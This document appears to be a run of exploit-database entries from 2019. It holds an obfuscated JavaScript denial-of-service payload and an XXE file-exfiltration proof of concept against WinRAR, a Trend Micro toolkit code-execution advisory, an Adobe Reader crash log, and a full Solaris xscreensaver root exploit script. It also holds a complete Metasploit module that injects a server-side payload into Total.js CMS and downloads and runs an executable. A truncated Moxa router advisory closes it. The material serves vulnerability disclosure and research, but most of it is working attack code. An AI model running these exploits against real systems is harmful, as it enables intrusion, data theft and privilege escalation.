  1. # Exploit Title: winrar 5.80 64bit - Denial of Service # Date: 2019-10-19 # Exploit Author: alblalawi # Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit # 1- open winrar or any file.rar # 2- help # 3- help topics # 4- Drag the exploit to the window # Save the content html <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",l=x.length;for(i=l-1;i>=0;i--) {try{o+=x.c" + "harAt(i);}catch(e){}}return o;}f(\")\\\"function f(x,y){var i,o=\\\"\\\\\\\""+ "\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod" + "e(x.charCodeAt(i)^(y++));}return o;}f(\\\"\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\"+ "\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh" + "83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\"+ "\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\"+ "\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02" + "5\\\\\\\\025\\\\\\\\010\\\\\\\\030\\\\\\\\020t<^!M@;?T+4W~Q`3}tfr4}bch4\\\\" + "\\\\177jith\\\\\\\\\\\"\\\\|\\\\\\\\003g[TLTB[u\\\\\\\\010\\\\\\\\013OB@[U_" + "F\\\\\\\\016h\\\\\\\\027\\\\\\\\033\\\\\\\\006d\\\\\\\\033\\\\\\\\004gNaP\\" + "\\\\\\003\\\\\\\\\\\"\\\\.&:z\\\\\\\\0314\\\\\\\\033&u9(>$>;p=3=3 70=d\\\\\\"+ "\\006y\\\\\\\\n\\\\\\\\037\\\\\\\\r<\\\\\\\\022\\\\\\\\010\\\\\\\\022\\\\\\" + "\\027J \\\\\\\\010\\\\\\\\004\\\\\\\\007\\\\\\\\r\\\\\\\\0177NS2\\\\\\\\035" + ",\\\\\\\\037.\\\\\\\\001(\\\\\\\\033VWX=\\\\\\\\023\\\\\\\\026\\\\\\\\\\\\\\"+ "\\\\\\\\\\016\\\\\\\\026l!\\\\\\\\\\\"\\\\_vYh'()Ynx-}g|1/3Wgsvl|Uyvx}k\\\\" + "\\\\010}\\\\\\\\000tWFTNX]\\\\\\\\004xDHBCl\\\\\\\\023\\\\\\\\033\\\\\\\\02" + "3\\\\\\\\024iDkV\\\\\\\\031\\\\\\\\032\\\\\\\\033\\\\\\\\177\\\\\\\\\\\\\\\\"+ "RS`2*/j\\\\\\\\0273)`\\\\\\\\025h\\\\\\\\027n\\\\\\\\021l,=5|6,0\\\\\\\\nu\\"+ 
"\\\\\\004{\\\\\\\\006yu}~\\\\\\\\003\\\\\\\\022=\\\\\\\\014CDE5\\\\\\\\002\\"+ "\\\\\\034I\\\\\\\\031\\\\\\\\003\\\\\\\\000MSO>\\\\\\\\036\\\\\\\\006\\\\\\" + "\\033\\\\\\\\035\\\\\\\\033\\\\\\\\021WXYZ'\\\\\\\\016!\\\\\\\\020 !\\\\\\\\"+ "\\\"\\\\_vYh;'ziye}z1LcN}(:tx|`$GnAp#\\\\\\\\017IVNH\\\\\\\\033\\\\\\\\004\\"+ "\\\\\\016\\\\\\\\023\\\\\\\\031\\\\\\\\021\\\"\\\\,28)\\\"(f};)lo,0(rtsbus." + "o nruter};)i(tArahc.x=+o{)--i;0=>i;1-l=i(rof}}{)e(hctac};l=+l;x=+x{yrt{)401" + "=!)31/l(tAedoCrahc.x(elihw;lo=l,htgnel.x=lo,\\\"\\\"=o,i rav{)x(f noitcnuf\""+ ")" ; while(x=eval(x)); //--> //]]> </script> <script type="text/javascript"> //<![CDATA[ <!-- var x="function f(x){var i,o=\"\",ol=x.length,l=ol;while(x.charCodeAt(l/13)!" + "=48){try{x+=x;l+=l;}catch(e){}}for(i=l-1;i>=0;i--){o+=x.charAt(i);}return o" + ".substr(0,ol);}f(\")19,\\\"ZPdw771\\\\b77-0xjk-7=3771\\\\sp,cw$520\\\\:330\\"+ "\\xg030\\\\jj9%530\\\\b000\\\\XZUUVX620\\\\LP\\\\\\\\Pr\\\\610\\\\KOHD400\\" + "\\620\\\\720\\\\\\\\\\\\WOWGPr\\\\530\\\\NClAauFkD,$gqutdr/3-ig~`|)rkanwbo2" + "30\\\\t\\\\ 520\\\\&310\\\\$n\\\\200\\\\)230\\\\/000\\\\-K530\\\\310\\\\310" + "\\\\n\\\\630\\\\010\\\\IULFW620\\\\600\\\\400\\\\700\\\\520\\\\=*100\\\\(70" + "0\\\\4500\\\\*310\\\\-u}xy8pt~}|{771\\\\itg/e771\\\\sb|`V620\\\\530\\\\NT\\" + "\\\\\\MdYjGh010\\\\@TVI[O410\\\\620\\\\n\\\\330\\\\ZB@CQA200\\\\SAijArGhEec" + "J{HaN*2S?9t)V)5,&waedtbn\\\\!010\\\\'420\\\\%n\\\\+r\\\\U]XY030\\\\PT^]\\\\" + "\\\\[ZY]GZEr\\\\CYQ@b~4|);/pw$:2'610\\\\?410\\\\=220\\\\vn720\\\\h520\\\\hz" + "f7!%$4\\\"\\\\730\\\\L\\\\\\\\JOfWdEjN420\\\\230\\\\230\\\\IU710\\\\@BE_IG]" + "AHyV771\\\\430\\\\300\\\\|kntnxixnv|:`kwe2S3h|r~)|wowgp>o\\\\\\\\410\\\\!B7" + "30\\\\330\\\\430\\\\020\\\\K030\\\\)600\\\\/L530\\\\530\\\\330\\\\600\\\\QN" + "C400\\\\500\\\\r\\\\320\\\\710\\\\720\\\\320\\\\M620\\\\710\\\\500\\\\2+>3?" 
+ "\\\"(f};o nruter};))++y(^)i(tAedoCrahc.x(edoCrahCmorf.gnirtS=+o;721=%y{)++i" + ";l<i;0=i(rof;htgnel.x=l,\\\"\\\"=o,i rav{)y,x(f noitcnuf\")" ; while(x=eval(x)); //--> //]]> </script>
  2. # Exploit Title: winrar 5.80 - XML External Entity Injection # Exploit Author: hyp3rlinx # Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe # Version: 5.80 # Tested on: Microsoft Windows Version 10.0.18362.418 64bit # POC 1- python -m SimpleHTTPServer (listens Port 8000) 2- open winrar or any file.rar 3- help 4- help topics 5- Drag the exploit to the window html file <htmlL> <body> <xml> <?xml version="1.0"?> <!DOCTYPE flavios [ <!ENTITY % file SYSTEM "C:\Windows\system.ini"> <!ENTITY % dtd SYSTEM "http://127.0.0.1:8800/start.dtd"> %dtd;]> <pwn>&send;</pwn> </xml> </body> </html> ============================== start.dtd <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8800?%file;'>"> %all;
  3. # Exploit Title: Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution # Date: 2019-10-19 # Exploit Author: hyp3rlinx # Vendor Homepage: www.trendmicro.com # Version: 1.62.0.1218 and below # Tested on: Microsoft Windows # CVE: N/A [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt [+] ISR: Apparition Security [Vendor] www.trendmicro.com [Product] Trend Micro Anti-Threat Toolkit (ATTK) 1.62.0.1218 and below Trend Micro Anti-Threat Toolkit (ATTK) can analyze malware issues and clean infections. It can be used to perform system forensic scans and clean the following infection types: General malware infection Master boot record Infection CIDOX/ RODNIX infection Rootkit infection Zbot infection Cryptolocker infection etc. [Vulnerability Type] Remote Code Execution [CVE Reference] CVE-2019-9491 [Security Issue] Trend Micro Anti-Threat Toolkit (ATTK) will load and execute arbitrary .EXE files if a malware author happens to use the vulnerable naming convention of "cmd.exe" or "regedit.exe" and the malware can be placed in the vicinity of the ATTK when a scan is launched by the end user. Since the ATTK is signed by a verified publisher and is therefore assumed trusted, any MOTW security warnings are bypassed if the malware was downloaded from the internet; it can also become a persistence mechanism, since each time the Anti-Threat Toolkit is run, so is the attacker's malware. Standalone affected components of ATTK and other integrations (e.g. WCRY Patch Tool, OfficeScan Toolbox, etc.) attk_collector_cli_x64.exe Hash: e8503e9897fd56eac0ce3c3f6db24fb1 TrendMicroRansomwareCollector64.r09.exe Hash: 798039027bb4363dcfd264c14267375f attk_ScanCleanOnline_gui_x64.exe Hash: f1d2ca4b14368911c767873cdbc194ed [References] https://success.trendmicro.com/solution/000149878 *All versions of the ATTK have been updated with the newer version. 
Anti-Threat Toolkit (ATTK) 1.62.0.1223 [Exploit/POC] Compile an .EXE from the "C" code below and name it using the vulnerable naming convention of "cmd.exe" or "regedit.exe". Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed. #include <windows.h> void main(void){ puts("Trend Micro Anti-Threat Toolkit PWNED!"); puts("Discovery: hyp3rlinx"); puts("CVE-2019-9491\n"); WinExec("powershell", 0); } [POC Video URL] https://www.youtube.com/watch?v=HBrRVe8WCHs [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: September 9, 2019 Vendor confirms vulnerability: September 25, 2019 Vendor requests to coordinate advisory: September 25, 2019 October 19, 2019 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  4. We have observed the following access violation exception in the latest version of Adobe Acrobat Reader DC for Windows, when opening a malformed PDF file: --- cut --- (7f2c.8be8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000080 ebx=00001b52 ecx=00000080 edx=00000080 esi=00000001 edi=6f587000 eip=6a005324 esp=050fbc14 ebp=050fbc34 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202 JP2KLib!IJP2KException::GetErrString+0x3224: 6a005324 8817 mov byte ptr [edi],dl ds:002b:6f587000=?? 0:000> kb # ChildEBP RetAddr Args to Child WARNING: Stack unwind information not available. Following frames may be wrong. 00 050fbc34 6a0030e8 00001b52 00001b53 00000000 JP2KLib!IJP2KException::GetErrString+0x3224 01 050fbcb0 69ff3bf0 0000000a 000002ce 00000001 JP2KLib!IJP2KException::GetErrString+0xfe8 02 050fbd44 69ff4132 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe9d0 03 050fbda0 69ff43f9 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xef12 04 050fbdc8 69ff37bc 00000000 0000000d 00000008 JP2KLib!JP2KCopyRect+0xf1d9 05 050fbe7c 69ff31eb 050fbf88 0000000d 00000008 JP2KLib!JP2KCopyRect+0xe59c 06 050fbebc 6a005d8a 0000000d 00000008 000000ff JP2KLib!JP2KCopyRect+0xdfcb 07 050fbf1c 5f721b53 62c74e88 0000000d 00000008 JP2KLib!JP2KImageDecodeImageRegion+0x2a 08 050fbf9c 5f71544b 6ad22fac 050fbfcc 5f115889 AcroRd32!AX_PDXlateToHostEx+0x343e93 09 050fbfa8 5f115889 6ad22fac 62c7cfb0 5f1157f0 AcroRd32!AX_PDXlateToHostEx+0x33778b 0a 050fbfcc 5f115783 6ad0efe0 00000001 0000001b AcroRd32!DllCanUnloadNow+0x4c929 0b 050fbfec 5f561d7a 050fc010 6ad0efe0 0000001b AcroRd32!DllCanUnloadNow+0x4c823 0c 050fc030 5f24afc8 c0020000 00000004 6ad0efe0 AcroRd32!AX_PDXlateToHostEx+0x1840ba 0d 050fc384 5f24a506 050fc3e0 53406a98 95e3efd6 AcroRd32!DllCanUnloadNow+0x182068 0e 050fc3bc 5f24a3e1 050fc3e0 53406a98 050fc44c 
AcroRd32!DllCanUnloadNow+0x1815a6 0f 050fc428 5f2493a8 c0020000 00000004 53406a98 AcroRd32!DllCanUnloadNow+0x181481 10 050fc888 5f2468f7 050fcb8c 686e45ac c0020000 AcroRd32!DllCanUnloadNow+0x180448 11 050fe068 5f246575 686e45ac c0020000 00000004 AcroRd32!DllCanUnloadNow+0x17d997 12 050fe138 5f22a25c 95e3ce72 5d91af78 00000000 AcroRd32!DllCanUnloadNow+0x17d615 13 050fe218 5f229057 00000001 00000000 00000000 AcroRd32!DllCanUnloadNow+0x1612fc 14 050fe264 5f21c183 5d91af78 00000001 00000000 AcroRd32!DllCanUnloadNow+0x1600f7 15 050fe3d8 5f21ba97 553e6dbc 00000001 6a169ef8 AcroRd32!DllCanUnloadNow+0x153223 16 050fe440 5f219281 95e3c8aa 5323efc8 5adccea8 AcroRd32!DllCanUnloadNow+0x152b37 17 050fe4c0 5f218dae 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x150321 18 050fe4fc 5f218d07 6a169ef8 65a08f40 5adcceb8 AcroRd32!DllCanUnloadNow+0x14fe4e 19 050fe584 5f2182ee 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14fda7 1a 050fe5c0 5f216f02 6a169ef8 65a08f40 050fe7b8 AcroRd32!DllCanUnloadNow+0x14f38e 1b 050fe884 5f215d98 6a169ef8 050fe918 050fe968 AcroRd32!DllCanUnloadNow+0x14dfa2 1c 050fe988 5f2143b8 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14ce38 1d 050fe9ec 5f21414d 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b458 1e 050fea0c 5f212d3c 6a169ef8 050fea90 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed 1f 050feac4 5f212762 00000001 00000000 95e3c776 AcroRd32!DllCanUnloadNow+0x149ddc 20 050feb1c 5f21257a 7d8b4ef0 00000001 95e3c7ea AcroRd32!DllCanUnloadNow+0x149802 21 050feb80 5f2122ff 050fec74 95e3c0fe 80882fa0 AcroRd32!DllCanUnloadNow+0x14961a 22 050fec94 5f0d687c 80882fa0 5f0d67a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f 23 050fecac 5f0d678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c 24 050fecc8 745de0bb 00180a60 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f 25 050fecf4 745e8849 5f0d66d0 00180a60 0000000f USER32!_InternalCallWinProc+0x2b 26 050fed18 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 27 
050fede8 745d8503 5f0d66d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 28 050fee50 745d8aa0 147683c0 00000000 0000000f USER32!DispatchClientMessage+0x1b3 29 050fee98 77371a6d 050feeb4 00000020 050fef14 USER32!__fnDWORD+0x50 2a 050feed0 745d91ee 050fef64 5a5cb65c 18836dd8 ntdll!KiUserCallbackDispatcher+0x4d 2b 050fef24 745d8c20 5f535978 050fef48 5f0eda6d USER32!DispatchMessageWorker+0x5be 2c 050fef30 5f0eda6d 050fef64 18836dd8 18836dd8 USER32!DispatchMessageW+0x10 2d 050fef48 5f0ed89e 050fef64 95e3c3d6 18836dd8 AcroRd32!DllCanUnloadNow+0x24b0d 2e 050fefbc 5f0ed744 95e3c39e 18836dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e 2f 050feff4 5f07c575 95e3dc0e 17484ff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 30 050ff064 5f07bf81 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x775 31 050ff484 0011783d 5f050000 00110000 17484ff8 AcroRd32!AcroWinMainSandbox+0x181 32 050ff850 002201aa 00110000 00000000 0bd5b3f2 AcroRd32_exe+0x783d 33 050ff89c 76698674 04f5f000 76698650 c83dc0c6 AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da 34 050ff8b0 77365e17 04f5f000 07a6f6f5 00000000 KERNEL32!BaseThreadInitThunk+0x24 35 050ff8f8 77365de7 ffffffff 7738ad9e 00000000 ntdll!__RtlUserThreadStart+0x2f 36 050ff908 00000000 00111390 04f5f000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled. - The crash occurs immediately after opening the PDF document, and is caused by attempting to write data outside of a heap-based buffer. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to 5 bytes inside of a binary JP2 image stream: 4 bytes at offset 0x195 changed from <FF FF E0 00> to <00 00 00 C0>, and 1 byte at offset 0x1ED changed from <0x53> to <0x5B>. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47528.zip
  5. @Mediaservice.net Security Advisory #2019-02 (last updated on 2019-10-16) Title: Local privilege escalation on Solaris 11.x via xscreensaver Application: Jamie Zawinski's xscreensaver 5.39 distributed with Solaris 11.4 Jamie Zawinski's xscreensaver 5.15 distributed with Solaris 11.3 Other versions starting from 5.06 are potentially affected Platforms: Oracle Solaris 11.x (tested on 11.4 and 11.3) Other platforms are potentially affected (see below) Description: A local attacker can gain root privileges by exploiting a design error vulnerability in the xscreensaver distributed with Solaris Author: Marco Ivaldi <[email protected]> Vendor Status: <[email protected]> notified on 2019-07-09 CVE Name: CVE-2019-3010 CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8) References: https://lab.mediaservice.net/advisory/2019-02-solaris-xscreensaver.txt https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html https://www.jwz.org/xscreensaver/ https://www.oracle.com/technetwork/server-storage/solaris11/ https://www.mediaservice.net/ https://0xdeadbeef.info/ 1. Abstract. Exploitation of a design error vulnerability in xscreensaver, as distributed with Solaris 11.x, allows local attackers to create (or append to) arbitrary files on the system, by abusing the -log command line switch introduced in version 5.06. This flaw can be leveraged to cause a denial of service condition or to escalate privileges to root. 2. Example Attack Session. raptor@stalker:~$ cat /etc/release Oracle Solaris 11.4 X86 Copyright (c) 1983, 2018, Oracle and/or its affiliates. All rights reserved. Assembled 16 August 2018 raptor@stalker:~$ uname -a SunOS stalker 5.11 11.4.0.15.0 i86pc i386 i86pc raptor@stalker:~$ id uid=100(raptor) gid=10(staff) raptor@stalker:~$ chmod +x raptor_xscreensaver raptor@stalker:~$ ./raptor_xscreensaver raptor_xscreensaver - Solaris 11.x LPE via xscreensaver Copyright (c) 2019 Marco Ivaldi <[email protected]> [...] 
Oracle Corporation SunOS 5.11 11.4 Aug 2018 root@stalker:~# id uid=0(root) gid=0(root) 3. Affected Platforms. This vulnerability was confirmed on the following platforms: * Oracle Solaris 11.x X86 [tested on 11.4 and 11.3, default installation] * Oracle Solaris 11.x SPARC [untested] Previous Oracle Solaris 11 versions might also be vulnerable. Based on our analysis and on feedback kindly provided by Alan Coopersmith of Oracle, we concluded that this is a Solaris-specific vulnerability, caused by the fact that Oracle maintains a slightly different codebase from the upstream one. Alan explained this as follows: "The problem in question here appears to be inherited from the long-ago fork [originally based on xscreensaver 4.05] Sun & Ximian did to add a gtk-based unlock dialog with accessibility support to replace the non-accessible Xlib unlock dialog that upstream provides, which moves the uid reset to after where the log file opening was later added." Specifically, the problem arises because of this bit of Solaris patches: https://github.com/oracle/solaris-userland/blob/18c7129a50c0d736cbac04dcfbfa1502eab71e33/components/desktop/xscreensaver/patches/0005-gtk-lock.patch#L3749-L3770 As an interesting side note, it appears Red Hat dropped this code back in 2002 with version 4.05-5: https://src.fedoraproject.org/rpms/xscreensaver/blob/9a0bab5a19b03db9671fc5a20714755445f19e21/f/xscreensaver.spec#L2178-2179 4. Fix. Oracle has assigned the tracking# S1182608 and has released a fix for all affected and supported versions of Solaris in their Critical Patch Update (CPU) of October 2019. As a temporary workaround, it is also possible to remove the setuid bit from the xscreensaver executable as follows (note that this might prevent it from working properly): bash-3.2# chmod -s /usr/bin/xscreensaver 5. Proof of Concept. An exploit for Oracle Solaris 11.x has been developed as a proof of concept. 
It can be downloaded from: https://github.com/0xdea/exploits/blob/master/solaris/raptor_xscreensaver #!/bin/sh # # raptor_xscreensaver - Solaris 11.x LPE via xscreensaver # Copyright (c) 2019 Marco Ivaldi <[email protected]> # # Exploitation of a design error vulnerability in xscreensaver, as # distributed with Solaris 11.x, allows local attackers to create # (or append to) arbitrary files on the system, by abusing the -log # command line switch introduced in version 5.06. This flaw can be # leveraged to cause a denial of service condition or to escalate # privileges to root. This is a Solaris-specific vulnerability, # caused by the fact that Oracle maintains a slightly different # codebase from the upstream one (CVE-2019-3010). # # "I'd rather be lucky than good any day." -- J. R. "Bob" Dobbs # "Good hackers force luck." -- ~A. # # This exploit targets the /usr/lib/secure/ directory in order # to escalate privileges with the LD_PRELOAD technique. The # implementation of other exploitation vectors, including those # that do not require gcc to be present on the target system, is # left as an exercise to fellow UNIX hackers;) # # Usage: # raptor@stalker:~$ chmod +x raptor_xscreensaver # raptor@stalker:~$ ./raptor_xscreensaver # [...] # Oracle Corporation SunOS 5.11 11.4 Aug 2018 # root@stalker:~# id # uid=0(root) gid=0(root) # root@stalker:~# rm /usr/lib/secure/64/getuid.so /tmp/getuid.* # # Vulnerable platforms: # Oracle Solaris 11 X86 [tested on 11.4 and 11.3] # Oracle Solaris 11 SPARC [untested] # echo "raptor_xscreensaver - Solaris 11.x LPE via xscreensaver" echo "Copyright (c) 2019 Marco Ivaldi <[email protected]>" echo # prepare the payload echo "int getuid(){return 0;}" > /tmp/getuid.c gcc -fPIC -Wall -g -O2 -shared -o /tmp/getuid.so /tmp/getuid.c -lc if [ $? -ne 0 ]; then echo "error: problem compiling the shared library, check your gcc" exit 1 fi # check the architecture LOG=/usr/lib/secure/getuid.so file /bin/su | grep 64-bit >/dev/null 2>&1 if [ $? 
-eq 0 ]; then LOG=/usr/lib/secure/64/getuid.so fi # start our own xserver # alternatively we can connect back to a valid xserver (e.g. xquartz) /usr/bin/Xorg :1 & # trigger the bug umask 0 /usr/bin/xscreensaver -display :1 -log $LOG & sleep 5 # clean up pkill -n xscreensaver pkill -n Xorg # LD_PRELOAD-fu cp /tmp/getuid.so $LOG LD_PRELOAD=$LOG su -
  6. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => 'Total.js CMS 12 Widget JavaScript Code Injection', 'Description' => %q{ This module exploits a vulnerability in Total.js CMS. The issue is that a user with admin permission can embed a malicious JavaScript payload in a widget, which is evaluated server side, and gain remote code execution. }, 'License' => MSF_LICENSE, 'Author' => [ 'Riccardo Krauter', # Original discovery 'sinn3r' # Metasploit module ], 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Total.js CMS on Linux', { 'Platform' => 'linux', 'CmdStagerFlavor' => 'wget'} ], [ 'Total.js CMS on Mac', { 'Platform' => 'osx', 'CmdStagerFlavor' => 'curl' } ] ], 'References' => [ ['CVE', '2019-15954'], ['URL', 'https://seclists.org/fulldisclosure/2019/Sep/5'], ['URL', 'https://github.com/beerpwn/CVE/blob/master/Totaljs_disclosure_report/report_final.pdf'] ], 'DefaultOptions' => { 'RPORT' => 8000, }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => '2019-08-30', # Reported to seclist 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The base path for Total.js CMS', '/']), OptString.new('TOTALJSUSERNAME', [true, 'The username for Total.js admin', 'admin']), OptString.new('TOTALJSPASSWORD', [true, 'The password for Total.js admin', 'admin']) ]) end class AdminToken attr_reader :token def initialize(cookie) @token = cookie.scan(/__admin=([a-zA-Z\d]+);/).flatten.first end def blank? token.blank? 
end end class Widget attr_reader :name attr_reader :category attr_reader :source_code attr_reader :platform attr_reader :url def initialize(p, u, stager) @name = "p_#{Rex::Text.rand_text_alpha(10)}" @category = 'content' @platform = p @url = u @source_code = %Q|<script total>| @source_code << %Q|global.process.mainModule.require('child_process')| @source_code << %Q|.exec("sleep 2;#{stager}");| @source_code << %Q|</script>| end end def check code = CheckCode::Safe res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'widgets') }) unless res vprint_error('Connection timed out') return CheckCode::Unknown end # If the admin's login page is visited too many times, we will start getting # a 401 (unauthorized response). In that case, we only have a header to work # with. if res.headers['X-Powered-By'].to_s == 'Total.js' code = CheckCode::Detected end # If we are here, then that means we can still see the login page. # Let's see if we can extract a version. html = res.get_html_document element = html.at('title') return code unless element.respond_to?(:text) title = element.text.scan(/CMS v([\d\.]+)/).flatten.first return code unless title version = Gem::Version.new(title) if version <= Gem::Version.new('12') # If we are able to check the version, we could try the default cred and attempt # to execute malicious code and see how the application responds. However, this # seems to a bit too aggressive so I'll leave that to the exploit part. return CheckCode::Appears end CheckCode::Safe end def auth(user, pass) json_body = { 'name' => user, 'password' => pass }.to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'api', 'login', 'admin'), 'ctype' => 'application/json', 'data' => json_body }) unless res fail_with(Failure::Unknown, 'Connection timed out') end json_res = res.get_json_document cookies = res.get_cookies # If it's an array it could be an error, so we are specifically looking for a hash. 
if json_res.kind_of?(Hash) && json_res['success'] token = AdminToken.new(cookies) @admin_token = token return token end fail_with(Failure::NoAccess, 'Invalid username or password') end def create_widget(admin_token) platform = target.platform.names.first host = datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket::source_address : datastore['SRVHOST'] port = datastore['SRVPORT'] proto = datastore['SSL'] ? 'https' : 'http' payload_name = "p_#{Rex::Text.rand_text_alpha(5)}" url = "#{proto}://#{host}:#{port}#{get_resource}/#{payload_name}" widget = Widget.new(platform, url, generate_cmdstager( 'Path' => "#{get_resource}/#{payload_name}", 'temp' => '/tmp', 'file' => payload_name ).join(';')) json_body = { 'name' => widget.name, 'category' => widget.category, 'body' => widget.source_code }.to_json res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'), 'cookie' => "__admin=#{admin_token.token}", 'ctype' => 'application/json', 'data' => json_body }) unless res fail_with(Failure::Unknown, 'Connection timed out') end res_json = res.get_json_document if res_json.kind_of?(Hash) && res_json['success'] print_good("Widget created successfully") else fail_with(Failure::Unknown, 'No success message in body') end widget end def get_widget_item(admin_token, widget) res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'), 'cookie' => "__admin=#{admin_token.token}", 'ctype' => 'application/json' }) unless res fail_with(Failure::Unknown, 'Connection timed out') end res_json = res.get_json_document count = res_json['count'] items = res_json['items'] unless count fail_with(Failure::Unknown, 'No count key found in body') end unless items fail_with(Failure::Unknown, 'No items key found in body') end items.each do |item| widget_name = item['name'] if widget_name.match(/p_/) return item end end [] end def clear_widget admin_token = get_admin_token widget = get_widget 
print_status('Finding the payload from the widget list...') item = get_widget_item(admin_token, widget) json_body = { 'id' => item['id'], 'picture' => item['picture'], 'name' => item['name'], 'icon' => item['icon'], 'category' => item['category'], 'datecreated' => item['datecreated'], 'reference' => item['reference'] }.to_json res = send_request_cgi({ 'method' => 'DELETE', 'uri' => normalize_uri(target_uri.path, 'admin', 'api', 'widgets'), 'cookie' => "__admin=#{admin_token.token}", 'ctype' => 'application/json', 'data' => json_body }) unless res fail_with(Failure::Unknown, 'Connection timed out') end res_json = res.get_json_document if res_json.kind_of?(Hash) && res_json['success'] print_good("Widget cleared successfully") else fail_with(Failure::Unknown, 'No success message in body') end end def on_request_uri(cli, req) print_status("#{cli.peerhost} requesting: #{req.uri}") if req.uri =~ /p_.+/ payload_exe = generate_payload_exe(code: payload.encoded) print_status("Sending payload to #{cli.peerhost}") send_response(cli, payload_exe, {'Content-Type' => 'application/octet-stream'}) return end send_not_found(cli) end def on_new_session(session) clear_widget end # This is kind of for cleaning up the wiget, because we cannot pass it as an # argument in on_new_session. def get_widget @widget end # This is also kind of for cleaning up widget, because we cannot pass it as an # argument directly def get_admin_token @admin_token end def exploit user = datastore['TOTALJSUSERNAME'] pass = datastore['TOTALJSPASSWORD'] print_status("Attempting to authenticate with #{user}:#{pass}") admin_token = auth(user, pass) fail_with(Failure::Unknown, 'No admin token found') if admin_token.blank? print_good("Authenticatd as: #{user}:#{pass}") print_status("Creating a widget...") @widget = create_widget(admin_token) super end end
  7. During an engagement for a client, RandoriSec found two vulnerabilities in Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found in the CLI, allowing an authenticated user to obtain root privileges. The other one is an improper access control issue in the web server that allows log files to be retrieved. As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to “responsibly disclose” them. The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa. Many thanks to the Moxa and ICS-CERT teams for their help. Advisory The following two product vulnerabilities were identified in Moxa's EDR-810 Series Secure Routers; all versions 5.1 and prior are vulnerable: CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. An authenticated attacker (with admin or configadmin privileges) can abuse the ping feature 